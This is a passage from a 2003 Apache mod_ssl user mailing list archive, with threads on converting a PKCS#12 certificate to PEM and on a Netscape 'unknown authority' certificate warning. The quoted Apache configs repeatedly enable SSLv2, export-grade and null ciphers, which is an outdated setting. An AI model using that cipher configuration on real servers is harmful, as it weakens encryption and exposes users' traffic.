In-Reply-To: <1049173342.1076.37.camel@dhcp-210-105>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Bert" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If you kill and restart your apache server you should see in its error =
log
the openssl version being used by apache when it starts and since apache =
is
controlling the compilation of mod_ssl then that should be your =
verification
of the version.

Jeff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 13:06:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 07ACD2AA03A; Tue,  1 Apr 2003 13:06:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from euhemsmtp01.bp.com (euhemsmtp01.bp.com [62.189.94.209])
	by master.modssl.org (Postfix) with ESMTP id 7312A2AA02B
	for ; Tue,  1 Apr 2003 13:06:38 +0200 (CEST)
Received: from euhemav002.bp.com (inetgate21.bp.com [62.189.94.193])
	by euhemsmtp01.bp.com (Switch-3.0.3/Switch-3.0.0) with SMTP id h31B9QhM028656
	for ; Tue, 1 Apr 2003 12:09:26 +0100 (BST)
Received: by euhemx1.bp.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 1 Apr 2003 12:05:43 +0100
Message-ID: <2FE5DE0B8790D411832700508BAF4859055BA764@eumorx5.bp.com>
From: "Witham, Darren (Contractor)" 
To: "'modssl-users@modssl.org'" 
Subject: Basic SSL/Certificates
Date: Tue, 1 Apr 2003 12:05:42 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Witham, Darren (Contractor)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi,

  This is proabably a real basic SSL question but I hope someone can put me
out of my misery. 

  I have Apache/Weblogic up and running using the demo keys and certs
provided by Weblogic 
  I have 3 files : ca.pem, democert.pem and demokey.pem. They are referenced
in 3 places in my httpd.conf file i.e
  SSLCertificateFile c:/bea/wlserver6.1/config/devdomain/democert.pem
  SSLCertificateKeyFile c:/bea/wlserver6.1/config/devdomain/demokey.pem
  TrustedCAFile c:/bea/wlserver6.1/config/devdomain/ca.pem  (apache/weblogic
plugin parameter).
Now that is working I have been given a 'real' certificate to use -
cert.der.  I am told this is a PKCS#12 file and should contain key and
certificate.

Question is I don't know what to do with it. I am getting confused when
reading documentation that I need to convert .der's to .pem's etc. Do I need
to extract the key ? If I reference this file directly in Apache it won't
start - it doesn't like the format. Do I use OpenSSL and use this file to
create 3 pem files as used above ?

Any pointers gratefully received.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 13:25:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AED072AA037; Tue,  1 Apr 2003 13:25:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx3.ust.hk (mx3.ust.hk [143.89.13.11])
	by master.modssl.org (Postfix) with ESMTP id C9AF62AA019
	for ; Tue,  1 Apr 2003 13:25:21 +0200 (CEST)
Received: from ust.hk (sqmail1.ust.hk [143.89.15.20])
	by mx3.ust.hk (8.12.9/8.12.9) with SMTP id h31BPD7O074088
	for ; Tue, 1 Apr 2003 19:25:14 +0800 (HKT)
Received: from 61.18.83.250
        (SquirrelMail authenticated user ccmartin)
        by sqmail.ust.hk with HTTP;
        Tue, 1 Apr 2003 19:25:14 +0800 (HKT)
Message-ID: <1175.61.18.83.250.1049196314.squirrel@sqmail.ust.hk>
Date: Tue, 1 Apr 2003 19:25:14 +0800 (HKT)
Subject: Re: Basic SSL/Certificates
From: "Martin Leung" 
To: 
In-Reply-To: <2FE5DE0B8790D411832700508BAF4859055BA764@eumorx5.bp.com>
References: <2FE5DE0B8790D411832700508BAF4859055BA764@eumorx5.bp.com>
X-Priority: 3
Importance: Normal
X-Mailer: SquirrelMail (version 1.2.8)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Martin Leung" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

You may extract the key and cert with the following command:

openssl pkcs12 -in cert.der -nodes -out certAndKey.pem

Then, you can extract cert.pem and key.pem from the output file.

ca.pem is probably used for authentication and not for SSL server setup.

Rgds.
Martin


>
> Hi,
>
>   This is proabably a real basic SSL question but I hope someone can put
> me
> out of my misery.
>
>   I have Apache/Weblogic up and running using the demo keys and certs
> provided by Weblogic
>   I have 3 files : ca.pem, democert.pem and demokey.pem. They are
> referenced
> in 3 places in my httpd.conf file i.e
>   SSLCertificateFile c:/bea/wlserver6.1/config/devdomain/democert.pem
> SSLCertificateKeyFile c:/bea/wlserver6.1/config/devdomain/demokey.pem
> TrustedCAFile c:/bea/wlserver6.1/config/devdomain/ca.pem
> (apache/weblogic
> plugin parameter).
> Now that is working I have been given a 'real' certificate to use -
> cert.der.  I am told this is a PKCS#12 file and should contain key and
> certificate.
>
> Question is I don't know what to do with it. I am getting confused when
> reading documentation that I need to convert .der's to .pem's etc. Do I
> need to extract the key ? If I reference this file directly in Apache it
> won't start - it doesn't like the format. Do I use OpenSSL and use this
> file to create 3 pem files as used above ?
>
> Any pointers gratefully received.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  1 22:56:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A5EFC2AA037; Tue,  1 Apr 2003 22:56:33 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from corpex01.bgpcorp.net (mailhost.bordersgroupinc.com [198.179.227.51])
	by master.modssl.org (Postfix) with ESMTP id 8F7EC2AA019
	for ; Tue,  1 Apr 2003 22:56:27 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.6344.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2F890.7E5C4330"
Subject: netscape warning message
Date: Tue, 1 Apr 2003 15:51:39 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: netscape warning message
Thread-Index: AcL4kSXIcXzljXpGTH+1bmkVNBVPlQ==
From: "Austin Conger (IT)" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Austin Conger (IT)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2F890.7E5C4330
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi All,
=20
When I view my ssl pages in Netscape 7.x, I am getting a, Website =
Certified by an Unknown Authority, popup message.
I am using Apache/2.0.43 and mod_ssl with openssl 0.9.6g running under =
Solaris 8.
=20
I am assuming its a configuration issue as the certificate is signed by =
Verisign and it works fine in IE.  I am using virtual hosts with =
separate IPs.
=20
What could be causing this to occur?  What errors might my httpd.conf =
file contain?
=20
Thanks,
=20
Austin
=20
=20
Some of my httpd configuration is as follows:
=20
Listen 10.0.0.26:80
Listen 10.0.0.27:80

ServerName 10.0.0.26:80


Include conf/ssl.conf


NameVirtualHost 10.0.0.27
=20

    DocumentRoot /site/htdocs/vhost
    RewriteEngine On
    RewriteRule ^/.* /site/htdocs/vhost/index.html

=20

    ServerName www.domain2.com
    ServerPath /domain2/
    DocumentRoot /site/htdocs/domain2
    RewriteEngine On
    RewriteRule ^(/domain2/.*) /site/vhost$1

=20

    ServerName www.domain3.com
    ServerPath /domain3/
    DocumentRoot /site/htdocs/domain3
    RewriteEngine On
    RewriteRule ^(/domain3/.*) /site/vhost$1

=20

    DocumentRoot /site/htdocs/
    ServerName  www.domain.com
    ServerAdmin  admin@domain.com
    ErrorLog /site/logs/error_log
    TransferLog /site/logs/access_log
=20
    SSLEngine on
    SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
=20
    SSLCertificateFile /usr/local/ssl/certs/verisigned.cert
=20
    SSLCertificateKeyFile /usr/local/ssl/private/domain.key
=20
    SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
=20
    CustomLog /site/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


=20
And the this is my ssl.conf file:
=20
=20

Listen 10.0.0.26:443

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:logs/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
=20


DocumentRoot "/site/htdocs"
ServerName www.domain.com
ServerAdmin a dmin@domain.com =20
ErrorLog /site/logs/error_log
TransferLog /site/logs/access_log

SSLEngine on
=20
SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /usr/local/ssl/certs/verisigned.cert

SSLCertificateKeyFile /usr/local/ssl/private/domain.key
=20
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /site/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
=20




------_=_NextPart_001_01C2F890.7E5C4330
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi=20
All,


 


When I =
view my ssl=20
pages in Netscape 7.x, I am getting a, Website Certified by an Unknown=20
Authority, popup message.


I am =
using=20
Apache/2.0.43 and mod_ssl with openssl 0.9.6g running under Solaris=20
8.


 


I am =
assuming its a=20
configuration issue as the certificate is signed by Verisign and it =
works fine=20
in IE.  I am using virtual hosts with separate =
IPs.


 


What =
could be=20
causing this to occur?  What errors might my httpd.conf file=20
contain?


 


Thanks,


 


Austin


 


 


Some =
of my httpd=20
configuration is as follows:


 


Listen =

10.0.0.26:80


Listen =

10.0.0.27:80


ServerName=20
10.0.0.26:80



<IfModule=20
mod_ssl.c>
Include=20
conf/ssl.conf
</IfModule>


NameVirtualHost=20
10.0.0.27


 


<VirtualHost=20
10.0.0.27>
    DocumentRoot=20
/site/htdocs/vhost
    RewriteEngine =
On
   =20
RewriteRule ^/.*=20
/site/htdocs/vhost/index.html
</VirtualHost>
=


 


<VirtualHost=20
10.0.0.27>
    ServerName www.domain2.com
   =
=20
ServerPath /domain2/
    DocumentRoot=20
/site/htdocs/domain2
    RewriteEngine=20
On
    RewriteRule ^(/domain2/.*)=20
/site/vhost$1
</VirtualHost>


 


<VirtualHost=20
10.0.0.27>
    ServerName www.domain3.com


   =20
ServerPath /domain3/
    DocumentRoot=20
/site/htdocs/domain3
    RewriteEngine=20
On
    RewriteRule ^(/domain3/.*)=20
/site/vhost$1
</VirtualHost>


 


<VirtualHost=20
_default_:443>
    DocumentRoot=20
/site/htdocs/
    ServerName www.domain.com
   =20
ServerAdmin admin@domain.com
=


   =20
ErrorLog /site/logs/error_log
    TransferLog=20
/site/logs/access_log


 


   =20
SSLEngine on
    SSLCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL


 


   =20
SSLCertificateFile =
/usr/local/ssl/certs/verisigned.cert


 


   =20
SSLCertificateKeyFile =
/usr/local/ssl/private/domain.key


 


   =20
SetEnvIf User-Agent ".*MSIE.*"=20
\
         nokeepalive=20
ssl-unclean-shutdown =
\
        =20
downgrade-1.0 force-response-1.0


 


   =20
CustomLog /site/logs/ssl_request_log=20
\
          "%t %h=20
%{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\"=20
%b"
</VirtualHost>


 


And =
the this is my=20
ssl.conf file:


 


 


<IfDefine=20
SSL>


Listen =

10.0.0.26:443



AddType=20
application/x-x509-ca-cert .crt
AddType=20
application/x-pkcs7-crl    .crl



SSLPassPhraseDialog =20
builtin



SSLSessionCache    &nb=
sp;   =20
dbm:logs/ssl_scache
SSLSessionCacheTimeout  =
300



SSLMutex =20
file:logs/ssl_mutex



SSLRandomSeed=20
startup builtin
SSLRandomSeed connect builtin


 


<VirtualHost=20
10.0.0.26:443>



DocumentRoot=20
"/site/htdocs"
ServerName www.domain.com
ServerAdmin admin@domain.com
ErrorLog=20
/site/logs/error_log
TransferLog =
/site/logs/access_log



SSLEngine=20
on


 


SSLCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL



SSLCertificateFile=20
/usr/local/ssl/certs/verisigned.cert



SSLCertificateKeyFile=20
/usr/local/ssl/private/domain.key


 


SetEnvIf User-Agent=20
".*MSIE.*" \
         =
nokeepalive=20
ssl-unclean-shutdown =
\
        =20
downgrade-1.0 force-response-1.0



CustomLog=20
/site/logs/ssl_request_log=20
\
          "%t %h=20
%{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


 


</VirtualHost>


</IfDefine>


------_=_NextPart_001_01C2F890.7E5C4330--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  2 12:37:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 812982AA03D; Wed,  2 Apr 2003 12:37:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id E34172AA01A
	for ; Wed,  2 Apr 2003 12:37:03 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h32AaPu24817
	for ; Wed, 2 Apr 2003 11:36:52 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 2 Apr 2003 11:36:20 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F288C@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: netscape warning message
Date: Wed, 2 Apr 2003 11:36:18 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Have you restarted the httpd process since you put:

    SSLCertificateFile /usr/local/ssl/certs/verisigned.cert
 
    SSLCertificateKeyFile /usr/local/ssl/private/domain.key

In your configuration? If not it will probably still be using the default
configuration, which I think will have a localhost.localdomain cert. I take
it that the above paths are where your key and certificate are?

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Anyone who believes in Evolution as fact just because they were told so at
school seems to have missed the relevance of the renaissance.





-----Original Message-----
From: Austin Conger (IT) [mailto:ACONGER@bordersgroupinc.com]
Sent: 01 April 2003 21:52
To: modssl-users@modssl.org
Subject: netscape warning message


Hi All,

When I view my ssl pages in Netscape 7.x, I am getting a, Website Certified
by an Unknown Authority, popup message.
I am using Apache/2.0.43 and mod_ssl with openssl 0.9.6g running under
Solaris 8.

I am assuming its a configuration issue as the certificate is signed by
Verisign and it works fine in IE.  I am using virtual hosts with separate
IPs.

What could be causing this to occur?  What errors might my httpd.conf file
contain?

Thanks,

Austin


Some of my httpd configuration is as follows:

Listen 10.0.0.26:80
Listen 10.0.0.27:80

ServerName 10.0.0.26:80


Include conf/ssl.conf


NameVirtualHost 10.0.0.27


    DocumentRoot /site/htdocs/vhost
    RewriteEngine On
    RewriteRule ^/.* /site/htdocs/vhost/index.html



    ServerName www.domain2.com
    ServerPath /domain2/
    DocumentRoot /site/htdocs/domain2
    RewriteEngine On
    RewriteRule ^(/domain2/.*) /site/vhost$1



    ServerName www.domain3.com
    ServerPath /domain3/
    DocumentRoot /site/htdocs/domain3
    RewriteEngine On
    RewriteRule ^(/domain3/.*) /site/vhost$1



    DocumentRoot /site/htdocs/
    ServerName www.domain.com
    ServerAdmin admin@domain.com
    ErrorLog /site/logs/error_log
    TransferLog /site/logs/access_log

    SSLEngine on
    SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

    SSLCertificateFile /usr/local/ssl/certs/verisigned.cert

    SSLCertificateKeyFile /usr/local/ssl/private/domain.key

    SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

    CustomLog /site/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



And the this is my ssl.conf file:



Listen 10.0.0.26:443

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:logs/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin



DocumentRoot "/site/htdocs"
ServerName www.domain.com
ServerAdmin admin@domain.com
ErrorLog /site/logs/error_log
TransferLog /site/logs/access_log

SSLEngine on

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /usr/local/ssl/certs/verisigned.cert

SSLCertificateKeyFile /usr/local/ssl/private/domain.key

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /site/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  2 16:59:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3A5FA2AA03D; Wed,  2 Apr 2003 16:59:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from corpex01.bgpcorp.net (mailhost.bordersgroupinc.com [198.179.227.51])
	by master.modssl.org (Postfix) with ESMTP id 25F052AA01A
	for ; Wed,  2 Apr 2003 16:59:21 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.6344.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: netscape warning message
Date: Wed, 2 Apr 2003 09:54:35 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: netscape warning message
Thread-Index: AcL5A9N6sWogKyxGRN6v78NO5I0GAAAJA2MQ
From: "Austin Conger (IT)" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Austin Conger (IT)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi John,

I have restarted the apache process several times since installing the =
new certificate.  I did have a self-signed cert installed first.  Could =
it be caching it somehow?  If so, is there a way to erase this cache?

Yes, these paths are the locations of my key and certificate.

thanks,

Austin



-----Original Message-----
From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
Sent: Wednesday, April 02, 2003 5:36 AM
To: modssl-users@modssl.org
Subject: RE: netscape warning message


Have you restarted the httpd process since you put:

    SSLCertificateFile /usr/local/ssl/certs/verisigned.cert
=20
    SSLCertificateKeyFile /usr/local/ssl/private/domain.key

In your configuration? If not it will probably still be using the =
default
configuration, which I think will have a localhost.localdomain cert. I =
take
it that the above paths are where your key and certificate are?

-=20
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 =
John.Airey@rnib.org.uk=20

Anyone who believes in Evolution as fact just because they were told so =
at
school seems to have missed the relevance of the renaissance.





-----Original Message-----
From: Austin Conger (IT) [mailto:ACONGER@bordersgroupinc.com]
Sent: 01 April 2003 21:52
To: modssl-users@modssl.org
Subject: netscape warning message


Hi All,

When I view my ssl pages in Netscape 7.x, I am getting a, Website =
Certified
by an Unknown Authority, popup message.
I am using Apache/2.0.43 and mod_ssl with openssl 0.9.6g running under
Solaris 8.

I am assuming its a configuration issue as the certificate is signed by
Verisign and it works fine in IE.  I am using virtual hosts with =
separate
IPs.

What could be causing this to occur?  What errors might my httpd.conf =
file
contain?

Thanks,

Austin


Some of my httpd configuration is as follows:

Listen 10.0.0.26:80
Listen 10.0.0.27:80

ServerName 10.0.0.26:80


Include conf/ssl.conf


NameVirtualHost 10.0.0.27


    DocumentRoot /site/htdocs/vhost
    RewriteEngine On
    RewriteRule ^/.* /site/htdocs/vhost/index.html



    ServerName www.domain2.com
    ServerPath /domain2/
    DocumentRoot /site/htdocs/domain2
    RewriteEngine On
    RewriteRule ^(/domain2/.*) /site/vhost$1



    ServerName www.domain3.com
    ServerPath /domain3/
    DocumentRoot /site/htdocs/domain3
    RewriteEngine On
    RewriteRule ^(/domain3/.*) /site/vhost$1



    DocumentRoot /site/htdocs/
    ServerName www.domain.com
    ServerAdmin admin@domain.com
    ErrorLog /site/logs/error_log
    TransferLog /site/logs/access_log

    SSLEngine on
    SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

    SSLCertificateFile /usr/local/ssl/certs/verisigned.cert

    SSLCertificateKeyFile /usr/local/ssl/private/domain.key

    SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

    CustomLog /site/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



And the this is my ssl.conf file:



Listen 10.0.0.26:443

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:logs/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin



DocumentRoot "/site/htdocs"
ServerName www.domain.com
ServerAdmin admin@domain.com
ErrorLog /site/logs/error_log
TransferLog /site/logs/access_log

SSLEngine on

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /usr/local/ssl/certs/verisigned.cert

SSLCertificateKeyFile /usr/local/ssl/private/domain.key

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /site/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




-=20

NOTICE: The information contained in this email and any attachments is=20
confidential and may be legally privileged. If you are not the=20
intended recipient you are hereby notified that you must not use,=20
disclose, distribute, copy, print or rely on this email's content. If=20
you are not the intended recipient, please notify the sender=20
immediately and then delete the email and any attachments from your=20
system.

RNIB has made strenuous efforts to ensure that emails and any=20
attachments generated by its staff are free from viruses. However, it=20
cannot accept any responsibility for any viruses which are=20
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email=20
and any attachments are those of the author and do not necessarily=20
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  2 17:22:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 19A772AA03B; Wed,  2 Apr 2003 17:22:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id C11642AA01A
	for ; Wed,  2 Apr 2003 17:22:25 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h32FLru10600
	for ; Wed, 2 Apr 2003 16:22:14 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 2 Apr 2003 16:21:47 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2893@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: netscape warning message
Date: Wed, 2 Apr 2003 16:21:49 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I missed the bit about it working on IE, which indicates that it must have
worked at some point. However, IE has its own unique form of caching which
sometimes takes a deletion of temporary Internet files and a reboot.
Netscape IIRC creates a .netscape/cache directory on Linux machines, but
it's been a long time since I used it on Windows so I don't know where that
would be. It too should have an option to remove them.

You could try deleting temporary Internet files on IE and see if it can
connect. Also check the logs generated by apache to see if there are any
warnings, eg being unable to open your key and certificate files. 

John



> -----Original Message-----
> From: Austin Conger (IT) [mailto:ACONGER@bordersgroupinc.com]
> Sent: 02 April 2003 15:55
> To: modssl-users@modssl.org
> Subject: RE: netscape warning message
> 
> 
> Hi John,
> 
> I have restarted the apache process several times since 
> installing the new certificate.  I did have a self-signed 
> cert installed first.  Could it be caching it somehow?  If 
> so, is there a way to erase this cache?
> 
> Yes, these paths are the locations of my key and certificate.
> 
> thanks,
> 
> Austin
> 
> 
> 
> -----Original Message-----
> From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk]
> Sent: Wednesday, April 02, 2003 5:36 AM
> To: modssl-users@modssl.org
> Subject: RE: netscape warning message
> 
> 
> Have you restarted the httpd process since you put:
> 
>     SSLCertificateFile /usr/local/ssl/certs/verisigned.cert
>  
>     SSLCertificateKeyFile /usr/local/ssl/private/domain.key
> 
> In your configuration? If not it will probably still be using 
> the default
> configuration, which I think will have a 
> localhost.localdomain cert. I take
> it that the above paths are where your key and certificate are?
> 
> - 
> John Airey, BSc (Jt Hons), CNA, RHCE
> Internet systems support officer, ITCSD, Royal National 
> Institute of the
> Blind,
> Bakewell Road, Peterborough PE2 6XU,
> Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 
> John.Airey@rnib.org.uk 
> 
> Anyone who believes in Evolution as fact just because they 
> were told so at
